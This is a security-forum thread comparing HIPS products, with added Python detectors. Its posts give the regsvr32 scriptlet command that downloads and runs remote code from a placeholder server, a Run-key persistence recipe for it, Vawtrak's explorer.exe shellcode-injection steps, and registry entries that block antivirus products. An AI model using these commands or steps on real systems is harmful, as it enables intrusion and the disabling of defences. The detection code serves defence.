Classical HIPS and policy based HIPS discussion

Discussion in 'other anti-malware software' started by BoerenkoolMetWorst, Jan 28, 2015.

Thread Status:
Not open for further replies.
  1. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,792
    Location:
    .
    Yeah. I posted about it yesterday...
     
  2. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,063
    Location:
    Canada
    How does the Applocker bypass make it on to the target machine in the first place?
     
  3. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    He is using regsvr32.exe to connect to a server and download the script remotely. Once downloaded, the script executes automatically.

    All that is needed on the local machine is anything to run regsvr32.exe, which is a trusted and necessary system process used to register Win and app services.

    So, all you need to do is host your .sct file at a location you control. From the target, simply execute

    regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
    It's not well documented that regsvr32.exe can accept a URL for a script.

    In order to trigger this bypass, place the code block, either VB or JS inside the <registration> element.


    Ref.: http://subt0x10.blogspot.mx/2016/04/bypass-application-whitelisting-script.html

    .sct files are downloaded and executed from a path like this -->

    <!-- Though, the name and extension are arbitrary.. -->
    <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
    <!-- Based on current research, no registry keys are written, since call "uninstall"


    Ref: https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
    Since no registry keys are being modified, this one will get by most HIPS that only monitor for changes to service keys.

    Bottom line folks, best way to infect Windows is using Windows processes!


     
    Last edited: Apr 23, 2016
  4. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,063
    Location:
    Canada

    Okay but this begs the question from me: "how does one with malicious intent make this happen on a victim's machine?" Is it possibly a malicious script or frame embedded in an ad, maybe?

     
  5. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    Any way a dropper can end up on a user's PC: e-mail, drive-by download, etc. The dropper could be wrapped in a script, or anything that can execute upon access.

    Primary purpose of this bypass is to show it can evade conventional whitelist detection mechanisms once run. I would say your best protection against this particular bypass is outbound firewall protection. Whatever runs regsvr32.exe on the local machine will result in an outbound connection to the rogue server. As long as the "whatever" is not a defined allowed outbound connection process, you should receive a firewall alert.
     
  6. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Easy for ERP users. I always get an alert on Regsvr, and if I don't know why it's there, just click block. End of story
     
  7. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,063
    Location:
    Canada
    Okay that makes sense. Thanks.

    That would certainly work, and also ad blocking or script control to prevent a drive-by. It seems, though I could be wrong, a .sct is opened via Adobe product, so maybe some control there as well.
     
  8. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    FYI. A way to run regsvr32.exe undetected in reference to the latest Applocker bypass.

    The following assumes that you're not using a HIPS and have not created rules to protect your registry run keys.

    Create the following run registry key:

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run {random filename} = regsvr32.exe /s /n /u /i:http://server/file.sct scrobj.dll
    -EDIT-

    Also take a close look at the bandit.ps1 PowerShell script from here: https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302. This is how he can run commands on the client PC and download files from the remote server.

    1. It creates a local host proxy server i.e. 127.0.0.1 using HTTP port.
    2. It creates a Win Firewall inbound rule for port 80 for the proxy server.

    Assumption is a user running Win firewall in default mode i.e. all outbound traffic allowed.

     
    Last edited: Apr 24, 2016
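Both the regsvr32 command line quoted earlier in the thread and the Run key value in the post above leave the same fingerprint: regsvr32 invoked with an /i: argument that is a URL and scrobj.dll as the DLL. The following detector is an added example written for this thread, not code from any post or from the referenced gist. It assumes nothing about a particular sensor: the process-creation records are a constructed "key=value" layout, and the Run key values are a constructed dictionary standing in for what a registry read of HKCU\...\CurrentVersion\Run would return.

```python
"""Spot regsvr32 invocations that fetch a remote scriptlet (.sct) via scrobj.dll.

Added example for this thread; it is not code from any post or from the
referenced gist. The log line layout and the Run-key values are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# regsvr32 named bare or by full path, with or without .exe, quoted or not.
_REGSVR32 = re.compile(r'(?:^|[\s"\\/])regsvr32(?:\.exe)?(?=["\s]|$)', re.I)
# /i: argument whose value is a URL instead of a local install string.
_REMOTE_I = re.compile(r'/i:"?(?:https?|ftp)://', re.I)
# scrobj.dll is the scriptlet host that runs the downloaded .sct.
_SCROBJ = re.compile(r'scrobj\.dll', re.I)
# /s suppresses dialogs; /n skips DllRegisterServer, so no registry keys are
# written (the thread notes this is what gets it past key-monitoring HIPS rules).
_SILENT = re.compile(r'(?:^|\s)/s(?=\s|$)', re.I)
_NO_REGISTER = re.compile(r'(?:^|\s)/n(?=\s|$)', re.I)


@dataclass
class Finding:
    source: str                      # where the command line was seen
    command_line: str
    reasons: List[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        # URL plus scrobj.dll is the complete pattern; one indicator alone is worth a look.
        return "high" if len(self.reasons) >= 2 else "medium"


def inspect_command_line(cmd: str, source: str = "process") -> Optional[Finding]:
    """Return a Finding when regsvr32 is asked to load a scriptlet from a URL."""
    if not _REGSVR32.search(cmd):
        return None
    reasons = []
    if _REMOTE_I.search(cmd):
        reasons.append("/i: argument is a URL")
    if _SCROBJ.search(cmd):
        reasons.append("scrobj.dll scriptlet host")
    if not reasons:
        return None                  # ordinary local DLL registration
    if _SILENT.search(cmd) and _NO_REGISTER.search(cmd):
        reasons.append("/s /n: silent, no DllRegisterServer, no registry footprint")
    return Finding(source, cmd, reasons)


def scan_process_log(lines: List[str]) -> List[Finding]:
    """Scan constructed process-creation records: 'key=value' fields joined by ' | '."""
    findings = []
    for line in lines:
        fields = dict(part.split("=", 1) for part in line.split(" | ") if "=" in part)
        cmd = fields.get("CommandLine")
        if not cmd:
            continue
        hit = inspect_command_line(cmd, source="process pid=" + fields.get("ProcessId", "?"))
        if hit:
            findings.append(hit)
    return findings


def scan_run_values(values: Dict[str, str]) -> List[Finding]:
    """Scan {value name: data} pairs as read from HKCU\\...\\CurrentVersion\\Run."""
    hits = (inspect_command_line(data, source=f"Run value '{name}'") for name, data in values.items())
    return [h for h in hits if h]


# Constructed sample input; pids, paths and the vendor names are made up.
SAMPLE_LOG = [
    "ProcessId=4120 | Image=C:\\Windows\\System32\\regsvr32.exe | "
    "CommandLine=regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | ParentImage=C:\\Windows\\explorer.exe",
    "ProcessId=4188 | Image=C:\\Windows\\System32\\regsvr32.exe | "
    "CommandLine=regsvr32 /s \"C:\\Program Files\\Vendor\\vendor.dll\" | ParentImage=C:\\Program Files\\Vendor\\setup.exe",
    "ProcessId=4201 | Image=C:\\Windows\\System32\\notepad.exe | "
    "CommandLine=notepad.exe notes.txt | ParentImage=C:\\Windows\\explorer.exe",
    "ProcessId=4260 | Image=C:\\Windows\\SysWOW64\\regsvr32.exe | "
    "CommandLine=\"C:\\Windows\\SysWOW64\\regsvr32.exe\" /u /i:https://server/update.sct scrobj.dll | "
    "ParentImage=C:\\Windows\\System32\\wscript.exe",
]
SAMPLE_RUN = {
    "VendorUpdater": "\"C:\\Program Files\\Vendor\\updater.exe\" /background",
    "x8f2k1": "regsvr32.exe /s /n /u /i:http://server/file.sct scrobj.dll",
}

if __name__ == "__main__":
    for hit in scan_process_log(SAMPLE_LOG) + scan_run_values(SAMPLE_RUN):
        print(f"[{hit.severity}] {hit.source}: {hit.command_line}")
        for reason in hit.reasons:
            print(f"    - {reason}")
```

The second sample record (a silent registration of a local DLL) is deliberately left alone: regsvr32 with a file path is routine installer behaviour, and alerting on every regsvr32 launch is what makes people click "allow" without reading. The URL and scrobj.dll are the parts worth a rule.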
  9. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    17,546
    Location:
    The Netherlands
    Actually, I don't believe any of these methods are related to RMI. Don't forget that RMI is just one of the code injection methods. Most HIPS can easily block the standard methods, but they don't always cover the more advanced ones. Also, in the presentation they mention a couple of kernel-mode code injection methods, and HIPS can't block them if the malicious driver is already loaded, as discussed before.
     
  10. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    It is safe to say that if any malware is running in kernel space, it is pretty much "game over." The purpose of a HIPS is to configure rules to prevent the kernel mode malware from installing itself.
     
  11. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    17,546
    Location:
    The Netherlands
  12. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    Would not be surprised if this version of WIN32/Gapz, which pioneered VBR modification:

    Win32/Gapz uses many exploitation techniques for implementing local privilege escalation (LPE) and infecting the VBR (Volume Boot Record) and MBR (Master Boot Record) in the earliest samples seen. The first interesting finding is that the VBR infection method is really new and not something we’ve seen before in other bootkit families

    Was used as a prototype for the Petya ransomware. "Old malware never dies, it just gets recycled."
     
  13. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    @Rasheed187

    Here is an especially nasty banking Trojan/backdoor that used Windows features against itself. In this case, it used SRP to disable close to 60 security products including Sandboxie. Note also that interception activity such as keylogging and the like was done remotely via the backdoor.
    Ref.: http://www.trendmicro.com/vinfo/us/threat-ecyclopedia/malware/bkdr_vawtrak.a

    More detail below. Note how this puppy is designed to avoid classical HIPS API detection:

    The payload is Vawtrak also known as Neverquest, a backdoor and a dangerous banking Trojan able to spread itself via social media, email and file transfer protocols. Vawtrak is able to recognize hundreds of financial institutions and contains a function that monitors certain keywords, allowing the cyber criminals to expand the list of targeted banks.

    Upon execution INVOICE-186591275-481264.SCR will attempt to inject itself into EXPLORER.EXE and several other running processes. Vawtrak might use the Shell_TrayWnd injection method to bypass HIPS detection.

    0. 0x304448c (13): Shell_TrayWnd
    1. 0x2e9c187 (14): GetWindowLongA
    2. 0x3044f94 (14): SetWindowLongA

    Its essence is to inject a shellcode into the Explorer process that loads and executes the malicious image. Here are the steps required to achieve this outcome:

    1. Open one of the shared sections from BaseNamedObjects mapped into explorer.exe address space, and write shellcode into this section.

    2. After the first step the shellcode is already written to explorer.exe address space, and the next step is for the dropper to search for the window "Shell_TrayWnd".

    3. The dropper calls the WinAPI function GetWindowLong() so as to get the address of the routine related to the "Shell_TrayWnd" window handler.

    4. At the next step the dropper calls the WinAPI function SetWindowLong() to modify "Shell_TrayWnd" window-related data.

    5. It calls SendNotifyMessage() to trigger shellcode execution in explorer.exe address space.


    Ref.: http://stopmalvertising.com/malware-reports/analysis-of-vawtrak.html
     
  14. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    6,144
    Location:
    Nicaragua
    Itman, according to the article, quote: "It checks for the presence of the following security-related directories", the malware checks for the presence of Sandboxie (as it does with the other security programs that are listed), but checking and disabling is not the same. Most malware can tell when they are running under SBIE, as SBIE doesn't hide itself. To disable SBIE, the malware has to get out of the sandbox, and that it cannot do. And don't forget, Sandboxie is not an anti keylogger. So, we need to take extra precautions when doing banking if we are going to rely on Sandboxie. Read below, "Defending against Key logger". :)
    http://www.sandboxie.com/index.php?DetectingKeyLoggers#defend

    Bo
     
  15. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    FYI. From the stopmalvertising.com article. It disables as follows:

    If Vawtrak finds any of the blacklisted software, it will add a registry entry under the key below that forces the application to run with restricted privileges.

    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths
    The key / value is built as follows:

    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\Paths\{generated GUID for the AV software}
    "ItemData" = {AV software path}
    "SaferFlags" = 0

    Below you can see that Vawtrak restricts the Symantec Firewall from running.

    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{0D465F19-6ADC-468D-AE7E-7DD151DD1955} "ItemData"
    Type: REG_SZ
    Data: C:\Documents and Settings\All Users\Application Data\Symantec
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{0D465F19-6ADC-468D-AE7E-7DD151DD1955} "SaferFlags"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{5B0864CB-555E-4ABF-833C-461756022477} "ItemData"
    Type: REG_SZ
    Data: C:\Program Files\Common Files\Symantec Shared
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{5B0864CB-555E-4ABF-833C-461756022477} "SaferFlags"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{72C24562-7B4E-44D1-8862-37956DB94BBF} "ItemData"
    Type: REG_SZ
    Data: C:\Program Files\Symantec
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{72C24562-7B4E-44D1-8862-37956DB94BBF} "SaferFlags"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
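The entries quoted above sit under CodeIdentifiers\0\Paths, and 0 is the Software Restriction Policy level SRP calls Disallowed, so a path rule there stops the matching executable from launching at all. The following parser is an added example for this thread, not code from the post or from the stopmalvertising.com article: it reads a reg.exe export of the CodeIdentifiers key and lists every Disallowed-level path rule, marking the ones that point at a security product. The export text is constructed; two of its rules reuse the GUIDs and Symantec paths from the post, the other two (a Downloads rule and an Unrestricted vendor rule) are made up to show that the check distinguishes levels.

```python
"""Audit Software Restriction Policy path rules from a reg.exe export.

Added example for this thread, not code from the post or from the article it
quotes. The export text below is constructed; two rules reuse the GUIDs and
Symantec paths quoted in the post, the rest are made up.
"""
import re
from typing import Dict, List, NamedTuple, Sequence, Tuple

SAFER_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers"

# SRP security levels; the numeric subkey under CodeIdentifiers is the level.
LEVEL_DISALLOWED = 0x00000
LEVEL_NAMES = {0x00000: "Disallowed", 0x01000: "Basic User",
               0x20000: "Constrained", 0x40000: "Unrestricted"}

# Matches ...\CodeIdentifiers\<level>\Paths\{GUID}
_RULE_KEY = re.compile(re.escape(SAFER_ROOT) + r"\\(\d+)\\Paths\\(\{[0-9A-Fa-f-]{36}\})$")


class PathRule(NamedTuple):
    level: int
    guid: str
    path: str      # ItemData
    flags: int     # SaferFlags


def _unquote(data: str) -> str:
    """Turn a .reg string value back into plain text (exports escape \\ and ")."""
    if data.startswith('"') and data.endswith('"'):
        return data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return data   # dword:... and hex(2):... values are kept as written


def parse_reg_export(text: str) -> List[PathRule]:
    """Collect the path rules from a 'Windows Registry Editor Version 5.00' export."""
    rules: List[PathRule] = []
    current = None                    # (level, guid) of the rule key being read
    values: Dict[str, str] = {}

    def flush() -> None:
        if current and "ItemData" in values:
            flags = values.get("SaferFlags", "dword:00000000")
            rules.append(PathRule(current[0], current[1], values["ItemData"],
                                  int(flags.split(":", 1)[1], 16)))

    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            flush()
            m = _RULE_KEY.match(line[1:-1])
            current = (int(m.group(1)), m.group(2)) if m else None
            values = {}
        elif current and line.startswith('"') and '"=' in line:
            name, _, data = line[1:].partition('"=')
            values[name] = _unquote(data)
    flush()
    return rules


def flag_disallowed(rules: Sequence[PathRule],
                    hints: Sequence[str] = ("symantec", "sandboxie")) -> List[Tuple[PathRule, str]]:
    """Return Disallowed-level rules with a verdict; 'hints' are product names to look for."""
    out = []
    for r in rules:
        if r.level != LEVEL_DISALLOWED:
            continue                  # other levels do not block execution outright
        hit = any(h in r.path.lower() for h in hints)
        out.append((r, "security product path disallowed" if hit else "disallowed path (review)"))
    return out


# Constructed export; GUIDs 0D465F19... and 72C24562... come from the post.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers]
"DefaultLevel"=dword:00040000
"TransparentEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{0D465F19-6ADC-468D-AE7E-7DD151DD1955}]
"ItemData"="C:\\Documents and Settings\\All Users\\Application Data\\Symantec"
"SaferFlags"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{72C24562-7B4E-44D1-8862-37956DB94BBF}]
"ItemData"="C:\\Program Files\\Symantec"
"SaferFlags"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{11111111-2222-4333-8444-555555555555}]
"ItemData"="%USERPROFILE%\\Downloads\\*.scr"
"SaferFlags"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths\{66666666-7777-4888-8999-000000000000}]
"ItemData"="C:\\Program Files\\Vendor"
"SaferFlags"=dword:00000000
"""

if __name__ == "__main__":
    for rule, verdict in flag_disallowed(parse_reg_export(SAMPLE_REG)):
        print(f"{LEVEL_NAMES[rule.level]:<12} {rule.guid} {rule.path}  <- {verdict}")
```

On a live machine the input comes from `reg export HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers safer.reg`; REG_EXPAND_SZ entries (exported as hex(2):...) are left undecoded here, so a rule whose ItemData shows up as raw hex should be read by hand. The constructed Downloads rule shows why the verdict matters: a Disallowed rule is not suspicious in itself, a Disallowed rule covering a security product's install directory is.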
     
  16. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    6,144
    Location:
    Nicaragua
    Perhaps you don't know, but Sandboxie also protects the registry.
    http://www.sandboxie.com/index.php?SandboxHierarchy#keys

    Besides that, two points: one, Sandboxie is not Symantec Firewall, and two, if sandboxed programs disable or terminate the Sandboxie helper programs that run within the sandbox, that's all that happens. If you install SBIE just for testing, and you terminate the SBIE processes that run in the sandbox, the sandboxed program still runs under Sandboxie's protection. You can test and see. And if you terminate the sandboxed program, the sandbox gets deleted.

    Bo
     
  17. JRViejo

    JRViejo Super Moderator

    Joined:
    Jul 9, 2008
    Posts:
    97,410
    Location:
    U.S.A.
    Because we have privately asked members not to take this thread Off Topic, and for whatever reason, it continues to go astray, we are closing this thread. There are other available product threads where specific software issues & comments can be posted.

    Thank you all for participating!
     